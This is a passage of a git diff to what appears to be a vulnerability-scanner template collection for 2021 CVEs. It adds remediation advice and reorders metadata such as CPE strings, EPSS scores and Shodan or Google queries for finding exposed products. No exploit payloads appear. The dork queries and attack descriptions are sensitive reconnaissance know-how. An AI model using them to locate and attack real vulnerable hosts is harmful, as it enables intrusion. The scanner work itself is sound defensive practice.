cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: "true" - shodan-query: title:"Grafana" + max-request: 3 vendor: grafana product: grafana + shodan-query: title:"Grafana" tags: packetstorm,cve,cve2021,grafana,lfi http: diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index c93dc76f0d..2d37d7beb5 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -5,21 +5,21 @@ info: author: gy741 severity: medium description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. + remediation: Upgrade to version 4.0.12 or later. reference: - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh - https://nvd.nist.gov/vuln/detail/CVE-2021-43810 - https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b - https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21 - https://github.com/Admidio/admidio/releases/tag/v4.0.12 - remediation: Upgrade to version 4.0.12 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-43810 cwe-id: CWE-79 epss-score: 0.00513 - cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* epss-percentile: 0.73678 + cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: admidio diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index e7bfd1585a..b77b770e1d 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -5,6 +5,8 @@ info: author: Adam Crosser,gy741 severity: critical description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. + remediation: | + Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine ServiceDesk Plus. reference: - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-44077 cwe-id: CWE-306 epss-score: 0.97373 - cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:* epss-percentile: 0.99854 + cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 8c994213e2..0d8694c816 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. + remediation: | + Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/cve-2021-44138 - https://github.com/maybe-why-not/reponame/issues/2 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-44138 cwe-id: CWE-22 epss-score: 0.00867 - cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* epss-percentile: 0.80249 + cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: html:"Resin" verified: "true" + max-request: 2 vendor: caucho product: resin + shodan-query: html:"Resin" tags: cve,cve2021,resin,caucho,lfi http: diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 584ea98a81..855ec3fe3b 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. + remediation: | + Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: - https://github.com/alibaba/Sentinel/issues/2451 classification: @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.00769 - cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* epss-percentile: 0.78983 + cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Sentinel Dashboard" vendor: hashicorp product: sentinel + shodan-query: title:"Sentinel Dashboard" tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel http: diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 4e1956e3ba..5a4ba1fa97 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. + remediation: | + Apply the latest security patch or upgrade to a patched version of Reprise License Manager to mitigate this vulnerability. reference: - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html @@ -17,15 +19,15 @@ info: cve-id: CVE-2021-44152 cwe-id: CWE-306 epss-score: 0.66748 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:* epss-percentile: 0.9749 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"Reprise License Manager" - google-query: inurl:"/goforms/menu" + max-request: 1 vendor: reprisesoftware product: reprise_license_manager + shodan-query: http.html:"Reprise License Manager" + google-query: inurl:"/goforms/menu" tags: cve,packetstorm,cve2021,rlm,auth-bypass http: diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 8abbd3c46d..9ba276dd26 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -6,21 +6,21 @@ info: severity: critical description: | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). reference: - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a - remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-20,CWE-917 epss-score: 0.97566 - cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* epss-percentile: 0.99996 + cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index a6ce928f87..7ad88c0cc6 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -5,19 +5,19 @@ info: author: furkansayim,xShuden severity: critical description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter. + remediation: Upgrade to version 8.1.1 or higher. reference: - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328 - https://twitter.com/RemotelyAlerts/status/1465697928178122775 - https://nvd.nist.gov/vuln/detail/CVE-2021-44427 - remediation: Upgrade to version 8.1.1 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 epss-score: 0.04257 - cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* epss-percentile: 0.91177 + cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rosariosis diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 1228d302c6..d63a143025 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 - remediation: Upgrade to Apache Superset 1.4.0 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 epss-score: 0.00853 - cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* epss-percentile: 0.80105 + cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: http.favicon.hash:1582430156 + max-request: 3 vendor: apache product: superset + shodan-query: http.favicon.hash:1582430156 tags: cve,cve2021,apache,superset,default-login http: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 2c5eac1103..987e9a5441 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -5,21 +5,21 @@ info: author: Adam Crosser severity: critical description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. + remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. reference: - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp - https://nvd.nist.gov/vuln/detail/CVE-2021-44515 - remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44515 cwe-id: CWE-287 epss-score: 0.97478 - cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* epss-percentile: 0.99947 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 95cfdcde58..67a1c35462 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware. reference: - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-44528 cwe-id: CWE-601 epss-score: 0.00087 - cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* epss-percentile: 0.35778 + cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 130ebe164b..94a032de69 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -5,6 +5,8 @@ info: author: duty_1g,phyr3wall,Tirtha severity: critical description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). + remediation: | + Apply the latest security patches provided by Ivanti to mitigate this vulnerability. reference: - https://forums.ivanti.com/s/article/SA-2021-12-02 - https://twitter.com/Dinosn/status/1505273954478530569 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-44529 cwe-id: CWE-94 epss-score: 0.95797 - cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* epss-percentile: 0.99192 + cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"LANDesk(R) Cloud Services Appliance" vendor: ivanti product: endpoint_manager_cloud_services_appliance + shodan-query: title:"LANDesk(R) Cloud Services Appliance" tags: cve2021,ivanti,epm,csa,injection,packetstorm,cve http: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index c118a4c82b..6a1f6ef0d6 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -5,6 +5,8 @@ info: author: danielmofer severity: medium description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) + remediation: | + Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability. reference: - https://github.com/cybelesoft/virtualui/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-44848 cwe-id: CWE-203 epss-score: 0.01597 - cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* epss-percentile: 0.85774 + cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cybelesoft diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index cd8e1589bf..7fb73137e1 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -5,6 +5,8 @@ info: author: Momen Eldawakhly,Evan Rubinstein severity: high description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-45043 - https://www.exploit-db.com/exploits/50588 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-45043 cwe-id: CWE-22 epss-score: 0.05404 - cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* epss-percentile: 0.9216 + cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: intitle:"HD-Network Real-time Monitoring System V2.0" vendor: hd-network_real-time_monitoring_system_project product: hd-network_real-time_monitoring_system + google-query: intitle:"HD-Network Real-time Monitoring System V2.0" tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot http: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index cf72bd1079..6db7ac0c03 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -5,6 +5,8 @@ info: author: ImNightmaree severity: critical description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2. reference: - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ - https://twitter.com/marcioalm/status/1471740771581652995 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-45046 cwe-id: CWE-917 epss-score: 0.97405 - cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* epss-percentile: 0.9988 + cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 37b44caf3b..a89aff9d9e 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -5,6 +5,8 @@ info: author: danielmofer severity: critical description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: - https://github.com/cybelesoft/virtualui/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-45092 cwe-id: CWE-74 epss-score: 0.05789 - cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* epss-percentile: 0.92399 + cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cybelesoft diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 455bc57ce9..2f7f22882e 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -5,21 +5,21 @@ info: author: Mr-xn severity: critical description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication. + remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard. reference: - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ - https://github.com/pingpongcult/CVE-2021-45232 - https://github.com/advisories/GHSA-wcxq-f256-53xp - https://twitter.com/403Timeout/status/1475715079173976066 - https://github.com/wuppp/cve-2021-45232-exp - remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-45232 cwe-id: CWE-306 epss-score: 0.97298 - cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* epss-percentile: 0.99794 + cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 3c584cb7b4..71a3dc4b78 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/source-trace/appcms/issues/8 - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.02148 - cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* epss-percentile: 0.87858 + cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.html:"Powerd by AppCMS" vendor: appcms product: appcms + shodan-query: http.html:"Powerd by AppCMS" tags: cve,cve2021,appcms,xss http: diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 47c712ed6e..8a660c5aa5 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Reprise License Manager 14.2. reference: - https://seclists.org/fulldisclosure/2022/Jan/31 - https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-45422 cwe-id: CWE-79 epss-score: 0.00218 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* epss-percentile: 0.59071 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Reprise License" verified: true + max-request: 1 vendor: reprisesoftware product: reprise_license_manager + shodan-query: http.html:"Reprise License" tags: cve,cve2021,reprise,xss,seclists http: diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index fc38781ffd..3a2a3fb9a9 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + remediation: | + Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability. reference: - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-45428 cwe-id: CWE-639 epss-score: 0.08441 - cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.93587 + cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.html:"TLR-2005KSH" verified: true + max-request: 3 vendor: telesquare product: tlr-2005ksh_firmware + shodan-query: http.html:"TLR-2005KSH" tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm http: diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 0b98c4a6f9..003f874041 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. + remediation: | + Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-45967 cwe-id: CWE-22 epss-score: 0.71742 - cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* epss-percentile: 0.97631 + cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: pascom_cloud_phone_system diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index a673b1eff3..65b3b6e38a 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-45968 cwe-id: CWE-918 epss-score: 0.01551 - cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* epss-percentile: 0.85551 + cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 3 vendor: jivesoftware diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index cf5910473d..dc9d53e008 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/49546 - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.00143 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.49483 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: car_rental_management_system_project diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 6228048dac..b6d8d3cbf5 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-46068 cwe-id: CWE-79 epss-score: 0.00084 - cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* epss-percentile: 0.34592 + cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve,cve2021,xss,vms,authenticated diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 67c3d71246..24e4deac39 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-46069 cwe-id: CWE-79 epss-score: 0.00084 - cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* epss-percentile: 0.34592 + cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve,cve2021,xss,vms,authenticated diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index fb2fb31736..b30da81d27 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS - 